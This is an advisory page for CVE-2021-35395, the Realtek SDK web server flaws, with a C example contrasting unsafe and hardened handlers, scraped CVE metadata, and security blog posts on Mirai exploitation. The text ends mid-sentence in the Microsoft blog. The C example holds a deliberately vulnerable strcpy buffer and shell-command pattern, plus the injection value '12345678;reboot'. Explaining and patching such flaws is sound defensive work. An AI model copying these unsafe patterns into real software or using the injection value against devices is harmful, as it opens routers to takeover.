Realtek Jungle SDK versions v2.x up to v3.4.14B provide an HTTP web server exposing a management interface that can be used to configure the access point. Two versions of this management interface exist: one based on Go-Ahead, named webs, and another based on Boa, named boa. Both are affected by these vulnerabilities. Specifically, these binaries are vulnerable to the following issues:
- stack buffer overflow in formRebootCheck due to unsafe copy of the submit-url parameter
- stack buffer overflow in formWsc due to unsafe copy of the submit-url parameter
- stack buffer overflow in formWlanMultipleAP due to unsafe copy of the submit-url parameter
- stack buffer overflow in formWlSiteSurvey due to unsafe copy of the ifname parameter
- stack buffer overflow in formStaticDHCP due to unsafe copy of the hostname parameter
- stack buffer overflow in formWsc due to unsafe copy of the 'peerPin' parameter
- arbitrary command execution in formSysCmd via the sysCmd parameter
- arbitrary command injection in formWsc via the 'peerPin' parameter
Exploitability of the identified issues differs depending on what the end vendor/manufacturer did with the Realtek SDK web server. Some vendors use it as-is, others add their own authentication implementation; some kept all the features of the server, some removed some of them, and some inserted their own set of features. However, given that the Realtek SDK implementation is full of insecure calls and that developers tend to re-use those examples in their custom code, any binary based on the Realtek SDK web server will probably contain its own set of issues on top of the Realtek ones (if kept). Successful exploitation of these issues allows remote attackers to gain arbitrary code execution on the device.
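The two bug classes in the list above, shown as an added example written for this page (it is not code from the Realtek SDK or from the advisory): the unsafe shape of each handler next to a hardened version. The buffer sizes, the IFNAME_MAX limit, the `iwpriv ... set_mib pin=` command line and every function name are assumptions made for illustration; the point is the pattern, not the SDK's exact code.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Illustrative handlers in the shape of the Realtek SDK form callbacks.
 * SUBMIT_URL_MAX, IFNAME_MAX and the iwpriv command line are assumptions
 * made for this example, not values taken from the SDK. */
#define SUBMIT_URL_MAX 64
#define IFNAME_MAX     16

/* Vulnerable shape (the submit-url / ifname / hostname overflows): a POST
 * parameter is strcpy'd into a fixed-size stack buffer, so any value of
 * 64 bytes or more rewrites the saved registers and return address. */
void form_reboot_check_unsafe(const char *submit_url)
{
    char tmp[SUBMIT_URL_MAX];
    strcpy(tmp, submit_url);            /* no length check at all */
    (void)tmp;                          /* redirect to tmp would follow */
}

/* Hardened copy: refuse over-long input rather than truncating silently.
 * Returns 0 on success, -1 if src plus its NUL does not fit in dst. */
int copy_param(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz) {
        if (dstsz) dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened handler: an over-long submit-url becomes a 400, not a crash. */
int form_reboot_check(const char *submit_url)
{
    char tmp[SUBMIT_URL_MAX];
    return copy_param(tmp, sizeof tmp, submit_url);
}

/* Drive form_reboot_check with a submit-url of `len` 'A's (len <= 255). */
int reboot_check_with_len(size_t len)
{
    char url[256];
    if (len > 255) len = 255;
    memset(url, 'A', len);
    url[len] = '\0';
    return form_reboot_check(url);
}

/* WPS PINs are 4 or 8 decimal digits. Allow-listing digits also rejects
 * ';', '`', '$(' and whitespace, which is what turns peerPin into command
 * injection once the value is pasted into a shell command line. */
int wps_pin_valid(const char *pin)
{
    size_t n = strlen(pin);
    if (n != 4 && n != 8) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)pin[i])) return 0;
    return 1;
}

/* Interface names: short, alphanumeric plus '-' (vap names look like
 * wlan0-va0), so ifname can neither overflow nor carry shell syntax. */
int ifname_valid(const char *ifname)
{
    size_t n = strlen(ifname);
    if (n == 0 || n >= IFNAME_MAX) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isalnum((unsigned char)ifname[i]) && ifname[i] != '-') return 0;
    return 1;
}

/* Vulnerable shape (formWsc peerPin, formSysCmd sysCmd): the raw parameter
 * is formatted into a command string that is then handed to system(). */
int build_wps_cmd_unsafe(char *out, size_t outsz,
                         const char *ifname, const char *pin)
{
    return snprintf(out, outsz, "iwpriv %s set_mib pin=%s", ifname, pin);
}

/* Hardened: validate both parameters, then build an argv vector for
 * execv()/posix_spawn() so no shell ever parses them. Returns the
 * "pin=..." argument on success, NULL if either parameter is rejected. */
const char *wps_pin_arg(const char *ifname, const char *pin)
{
    static char pinbuf[16];             /* "pin=" + 8 digits + NUL */
    const char *argv[5];
    if (!ifname_valid(ifname) || !wps_pin_valid(pin)) return NULL;
    snprintf(pinbuf, sizeof pinbuf, "pin=%s", pin);
    argv[0] = "iwpriv"; argv[1] = ifname; argv[2] = "set_mib";
    argv[3] = pinbuf;   argv[4] = NULL;
    /* execv("/bin/iwpriv", (char *const *)argv) would go here */
    return argv[3];
}

int main(void)
{
    char cmd[128];
    build_wps_cmd_unsafe(cmd, sizeof cmd, "wlan0", "12345678;reboot");
    printf("unsafe command line: %s\n", cmd);
    printf("200-byte submit-url accepted: %s\n",
           reboot_check_with_len(200) == 0 ? "yes" : "no");
    printf("injected peerPin accepted:    %s\n",
           wps_pin_arg("wlan0", "12345678;reboot") ? "yes" : "no");
    return 0;
}
```

Rejecting over-long input with an error is deliberate: an strlcpy-style truncation of submit-url would silently change where the client is redirected, and a truncated sysCmd or peerPin just turns one bad request into another. The argv vector matters as much as the validation; even a validated value should never travel through system() when an exec-family call will do.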
{"id": "CVE-2021-35395", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-35395", "description": "Realtek Jungle SDK version v2.x up to v3.4.14B provides an HTTP web server exposing a management interface that can be used to configure the access point. Two versions of this management interface exists: one based on Go-Ahead named webs and another based on Boa named boa. Both of them are affected by these vulnerabilities. Specifically, these binaries are vulnerable to the following issues: - stack buffer overflow in formRebootCheck due to unsafe copy of submit-url parameter - stack buffer overflow in formWsc due to unsafe copy of submit-url parameter - stack buffer overflow in formWlanMultipleAP due to unsafe copy of submit-url parameter - stack buffer overflow in formWlSiteSurvey due to unsafe copy of ifname parameter - stack buffer overflow in formStaticDHCP due to unsafe copy of hostname parameter - stack buffer overflow in formWsc due to unsafe copy of 'peerPin' parameter - arbitrary command execution in formSysCmd via the sysCmd parameter - arbitrary command injection in formWsc via the 'peerPin' parameter Exploitability of identified issues will differ based on what the end vendor/manufacturer did with the Realtek SDK webserver. Some vendors use it as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK webserver will probably contains its own set of issues on top of the Realtek ones (if kept). 
Successful exploitation of these issues allows remote attackers to gain arbitrary code execution on the device.", "published": "2021-08-16T12:15:00", "modified": "2021-08-26T14:27:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35395", "reporter": "cve@mitre.org", "references": ["https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en", "https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain", "https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf"], "cvelist": ["CVE-2021-35395"], "immutableFields": [], "lastseen": "2022-03-23T18:48:58", "viewCount": 464, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:1C877D41-AB57-45E1-A0E5-2FE1E723EB0C"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0538"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7"]}, {"type": "thn", "idList": ["THN:B73C2EFCE2F6E4AC50F5CFFF3165A5C1"]}, 
{"type": "threatpost", "idList": ["THREATPOST:3CDCE42FF7DD2A68B77DC15C8BB1A6BA"]}], "rev": 4}, "score": {"value": 2.1, "vector": "NONE"}, "twitter": {"counter": 22, "modified": "2021-08-17T07:54:24", "tweets": [{"link": "https://twitter.com/CyberSecDN/status/1430145807689437242", "text": "Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395) - https://t.co/JdSWLmYNRN?amp=1 /hashtag/cybersecurity?src=hashtag_click /hashtag/infosec?src=hashtag_click"}, {"link": "https://twitter.com/hintz2010/status/1430534974487384068", "text": "Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395) /hashtag/cybersecurity?src=hashtag_click /hashtag/awareness?src=hashtag_click /hashtag/vulnerability?src=hashtag_click"}, {"link": "https://twitter.com/kuriharan/status/1430534176344793096", "text": "Learn it. Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395) https://t.co/ZjU6IknlNp?amp=1 /hashtag/tech?src=hashtag_click /hashtag/digital?src=hashtag_click /hashtag/data?src=hashtag_click /hashtag/security?src=hashtag_click"}, {"link": "https://twitter.com/UtopianKnightUK/status/1430152571616890883", "text": "... to exploit CVE-2021-35395, a group of vulnerabilities in the web interface of the Realtek SDK, to spread Mirai malware to vulnerable IoT devices. /hashtag/cybernews?src=hashtag_click /hashtag/thecybernewsfeed?src=hashtag_click"}, {"link": "https://twitter.com/ipssignatures/status/1430245535064236043", "text": "(Same from about 4 hours ago.)\nI think that the most retweeted(39 times) tweet that contains CVE ID between Aug 23 2021 19:01 UTC and Aug 24 2021 19:00 UTC is:\n/bad_packets/status/1430013950364585991\nIt has CVE-2021-35395. 
/hashtag/l24_iflwhkp3yv5om?src=hashtag_click"}, {"link": "https://twitter.com/ipssignatures/status/1430185136973402125", "text": "(second \u2192 most)\nI think that the most retweeted(33 times) tweet that contains CVE ID between Aug 23 2021 15:01 UTC and Aug 24 2021 15:00 UTC is:\n/bad_packets/status/1430013950364585991\nIt has CVE-2021-35395. /hashtag/l24_iflwhkp3yv5om?src=hashtag_click"}, {"link": "https://twitter.com/cyberreport_io/status/1430153556779094026", "text": "Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395) - Help Net Security https://t.co/o2kjX0k1tC?amp=1 /hashtag/cybersecurity?src=hashtag_click /hashtag/threatintelligence?src=hashtag_click /hashtag/cybernews?src=hashtag_click"}, {"link": "https://twitter.com/BishwarupamSaha/status/1430149367567060995", "text": "New variant of /hashtag/Mirai?src=hashtag_click Botnet targeting thousands of IoT devices by abusing /hashtag/Realtek?src=hashtag_click SDK /hashtag/vulnerability?src=hashtag_click tracked as CVE-2021-35395\n/hashtag/router?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/IoT?src=hashtag_click /hashtag/botnet?src=hashtag_click /hashtag/infosec?src=hashtag_click /hashtag/threatIntel?src=hashtag_click"}, {"link": "https://twitter.com/SouthSeasData/status/1430184283914842113", "text": "Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395) https://t.co/1tutAQnAKd?amp=1\n/hashtag/IoTSecurity?src=hashtag_click /hashtag/Realtek?src=hashtag_click /hashtag/vulnerability?src=hashtag_click /hashtag/Mirai?src=hashtag_click /hashtag/malware?src=hashtag_click /hashtag/botnet?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/CVE?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/infosec?src=hashtag_click"}, {"link": "https://twitter.com/Security_411/status/1430186646079561736", "text": "Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395)"}]}, "exploitation": {"wildExploitedSources": 
[{"type": "attackerkb", "idList": ["AKB:1C877D41-AB57-45E1-A0E5-2FE1E723EB0C"]}], "wildExploited": true}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:1C877D41-AB57-45E1-A0E5-2FE1E723EB0C"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0538"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7"]}, {"type": "thn", "idList": ["THN:B73C2EFCE2F6E4AC50F5CFFF3165A5C1"]}, {"type": "threatpost", "idList": ["THREATPOST:3CDCE42FF7DD2A68B77DC15C8BB1A6BA"]}]}, "affected_software": {"major_version": [{"name": "realtek realtek jungle sdk", "version": 3}]}, "vulnersScore": 2.1}, "_state": {"wildexploited": 0, "dependencies": 1659911869, "score": 1659847081, "cisa_kev_wildexploited": 1660152412, "affected_software_major_version": 1671597168}, "_internal": {"score_hash": "01fd37a1e21d84469140d888a1df6475"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:realtek:realtek_jungle_sdk:3.4.14b"], "cpe23": ["cpe:2.3:a:realtek:realtek_jungle_sdk:3.4.14b:*:*:*:*:*:*:*"], "cwe": ["CWE-77", "CWE-787"], "affectedSoftware": [{"cpeName": "realtek:realtek_jungle_sdk", "version": "3.4.14b", "operator": "le", "name": "realtek realtek jungle sdk"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:realtek:realtek_jungle_sdk:3.4.14b:*:*:*:*:*:*:*", "versionStartIncluding": "2.0", "versionEndIncluding": "3.4.14b", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en", "name": "https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain", "name": "https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain", "refsource": "MISC", "tags": ["Exploit", "Third Party 
Advisory"]}, {"url": "https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf", "name": "https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf", "refsource": "MISC", "tags": ["Patch"]}]}
{"cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Realtek Jungle SDK version v2.x up to v3.4.14B arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Realtek SDK Arbitrary Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35395"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-35395", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-12-29T08:11:18", "description": "Realtek Jungle SDK version v2.x up to v3.4.14B provides an HTTP web server exposing a management interface that can be used to configure the access point. Two versions of this management interface exists: one based on Go-Ahead named webs and another based on Boa named boa. Both of them are affected by these vulnerabilities. 
Specifically, these binaries are vulnerable to the following issues: \u2013 stack buffer overflow in formRebootCheck due to unsafe copy of submit-url parameter \u2013 stack buffer overflow in formWsc due to unsafe copy of submit-url parameter \u2013 stack buffer overflow in formWlanMultipleAP due to unsafe copy of submit-url parameter \u2013 stack buffer overflow in formWlSiteSurvey due to unsafe copy of ifname parameter \u2013 stack buffer overflow in formStaticDHCP due to unsafe copy of hostname parameter \u2013 stack buffer overflow in formWsc due to unsafe copy of \u2018peerPin\u2019 parameter \u2013 arbitrary command execution in formSysCmd via the sysCmd parameter \u2013 arbitrary command injection in formWsc via the \u2018peerPin\u2019 parameter Exploitability of identified issues will differ based on what the end vendor/manufacturer did with the Realtek SDK webserver. Some vendors use it as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK webserver will probably contains its own set of issues on top of the Realtek ones (if kept). 
Successful exploitation of these issues allows remote attackers to gain arbitrary code execution on the device.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-35395", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35392", "CVE-2021-35395"], "modified": "2021-08-27T00:00:00", "id": "AKB:1C877D41-AB57-45E1-A0E5-2FE1E723EB0C", "href": "https://attackerkb.com/topics/BdNM7QKhjo/cve-2021-35395", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:00", "description": "A buffer overflow vulnerability exists in Realtek Jungle SDK. 
Successful exploitation of this vulnerability could result in a denial of service or execution of arbitrary code into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T00:00:00", "type": "checkpoint_advisories", "title": "Realtek Jungle SDK Buffer Overflow (CVE-2021-35392; CVE-2021-35393; CVE-2021-35395)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35392", "CVE-2021-35393", "CVE-2021-35395"], "modified": "2021-08-31T00:00:00", "id": "CPAI-2021-0538", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-08-27T12:34:55", "description": "A few weeks ago we blogged about a vulnerability in home routers that was weaponized by the Mirai botnet just two days after disclosure. 
Mirai hoovers up vulnerable Internet of Things (IoT) devices and adds them to its network of zombie devices, which can then be used to [launch huge Distributed Denial of Service](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) (DDoS) attacks.\n\nLast time it was a [vulnerability in the Arcadyan firmware](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) found in devices distributed by some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nA similar situation is going on right now with routers and Wi-Fi amplifiers that are built on the Realtek RTL819xD chipset. Realtek chipsets are found in many embedded IoT devices. At least 65 vendors are affected. The vulnerabilities enable unauthenticated attackers to fully compromise the target device and execute arbitrary code with the highest level of privilege. Exactly what Mirai wants.\n\n### Vulnerabilities\n\nThe vulnerabilities were found and disclosed by [IoT Inspector](<https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/>), a platform for automated security analysis of IoT firmware. In total they identified more than a dozen vulnerabilities, but one of them (CVE-2021-35395) has already been found to be actively exploited in the wild.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The description of [CVE-2021-35395](<https://nvd.nist.gov/vuln/detail/CVE-2021-35395>) contains a pretty dense explanation, but it boils down as follows.\n\nThere are two types of management interface that can be accessed over the Internet. 
Both of them are vulnerable to multiple stack buffer overflows due to "unsafe" copying of parameters, and two separate arbitrary command injection problems, again stemming from the apparently unsafe handling of parameters. These allow an attacker to run arbitrary commands on the vulnerable device.\n\nFor anyone unfamiliar with web programming, this implies that the code behind these Internet-exposed management interfaces is failing to perform the most basic security hygiene.\n\nThe description ends:\n\n> Some vendors use [the management interface] as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK web server will probably contain its own set of issues on top of the Realtek ones\u2026\n\nIn other words, how vulnerable your device is may depend on whether, and how well, the vendor added their own authentication methods, but vendors may well have added more problems.\n\n### Same botnet, same operator?\n\nWith all the similarities in the vulnerabilities and the speed with which they are being exploited after disclosure, it will not come as a total surprise that the botnet that is actively going after these vulnerable devices is Mirai. Mirai is the name of the malware behind one of the most active and well-known IoT botnets. 
After the source code of the original Mirai botnet was leaked, it was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets.\n\n[Researchers at SAM Seamless Network](<https://securingsam.com/realtek-vulnerabilities-weaponized/>) were able to establish that the web server serving the Mirai botnet behind these attacks uses the same network subnet [seen by Unit 42](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in March of 2021, indicating that the same attacker was behind those incidents. Due to the similarity in scripts it was assumed that the same actor was behind the exploitation of the vulnerability listed under CVE-2021-20090, which is present in the Arcadyan firmware.\n\nIt also stands to reason to assume this is the actor that was responsible for the [largest DDoS attack](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) recorded to date, just last week.\n\n### Mitigation\n\nRealtek has since [patched](<https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf>) the vulnerabilities, but it will take a while for manufacturers who use their chipset to make the patches available to their customers. And again, many of the owners of vulnerable devices are home users. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nRealtek is a common chipset used for sound and Wi-Fi by many vendors such as ARRIS, ASUSTek, Belkin, Buffalo, D-Link, EnGenius, Huawei, LG, Logitec, NetGear, TRENDnet, and many more. I found a [list of affected devices courtesy of Mainstream Technologies](<https://www.mainstream-tech.com/realtek-security-notice/>) but this is only a partial list. 
Alongside its list, Mainstream Technologies warns that: "If your device is over 10 years old, it definitely will not get a patch. If it is over 5 years it probably will not get a patch".\n\nSo even if your device is not on it, that doesn\u2019t mean it\u2019s not vulnerable. Any device that uses a Realtek RTL819xD chipset is vulnerable and the bots scanning the internet for vulnerable devices will definitely be able to find them.\n\nIt is cases like these that could end up being a deciding factor in the discussion of whether vendors/governments/[law enforcement](<https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/>) should be allowed to patch vulnerable systems that do not belong to them or to the infrastructure they are responsible for.\n\nStay safe, everyone!\n\nThe post [Realtek-based routers, smart devices are being gobbled up by a voracious botnet](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T13:36:52", "type": "malwarebytes", "title": "Realtek-based routers, smart devices are being gobbled up by a voracious botnet", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-35392", "CVE-2021-35395"], "modified": "2021-08-24T13:36:52", "id": "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-12-08T23:24:29", "description": "> **December 8, 2022 update** - Reflected additional research on Boa-related CVEs and updated supply chain diagram.\n\nVulnerabilities in network components, architecture files, and developer tools have become increasingly popular attack vectors to gain access into secure networks and devices. External tools and products that are managed by vendors and developers can pose a security risk, especially to targets in sensitive industries. Attacks on software and hardware supply chains, like [Log4J](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) and [SolarWinds](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>), have highlighted the importance of visibility across device components and proactively securing networks. 
A [report](<https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets?__hstc=156209188.65c2d309abc7befc704e210a65154bf8.1666196607997.1666196607997.1666196607997.1&__hssc=156209188.1.1666196607998&__hsfp=2445685111>) published by Recorded Future in April 2022 detailed suspected electrical grid intrusion activity and implicated common IoT devices as the vector used to gain a foothold into operational technology (OT) networks and deploy malicious payloads. While investigating the attack activity, Microsoft researchers identified a vulnerable component on all the IP addresses published as IOCs and found evidence of a supply chain risk that may affect millions of organizations and devices.\n\nWe assessed the vulnerable component to be the Boa web server, which is often used to access settings and management consoles and sign-in screens in devices. Despite being discontinued in 2005, the Boa web server continues to be implemented by different vendors across a variety of IoT devices and popular software development kits (SDKs). Without developers managing the Boa web server, its known vulnerabilities could allow attackers to silently gain access to networks by collecting information from files. Moreover, those affected may be unaware that their devices run services using the discontinued Boa web server, and that firmware updates and downstream patches do not address its known vulnerabilities.\n\nIn this blog, we detail the risks affiliated with vulnerable components, highlighting the Boa web server, and how we suspect these components could be exploited to target critical industries. We also discuss the difficulties with identifying these components in device supply chains. 
To provide comprehensive protection against such attacks, we offer detection information to identify vulnerable components and guidance for organizations and network operators to improve their security posture.\n\n## Investigating the attack activity\n\nThe attack detailed in the Recorded Future report was one of several intrusion attempts on Indian critical infrastructure since 2020, with the [most recent attack](<https://www.bleepingcomputer.com/news/security/hive-claims-ransomware-attack-on-tata-power-begins-leaking-data/>) on IT assets confirmed in October 2022. Microsoft assesses that Boa servers were running on the IP addresses on the list of IOCs published by Recorded Future at the time of the report\u2019s release and that the electrical grid attack targeted exposed IoT devices running Boa.\n\nMicrosoft further identified that half of the IP addresses published by Recorded Future returned suspicious HTTP response headers, which might be associated with the active deployment of the malicious tool identified by Recorded Future. The combination of Boa and suspicious response headers was identified on another set of IP addresses, displaying similar behavior to those found by Recorded 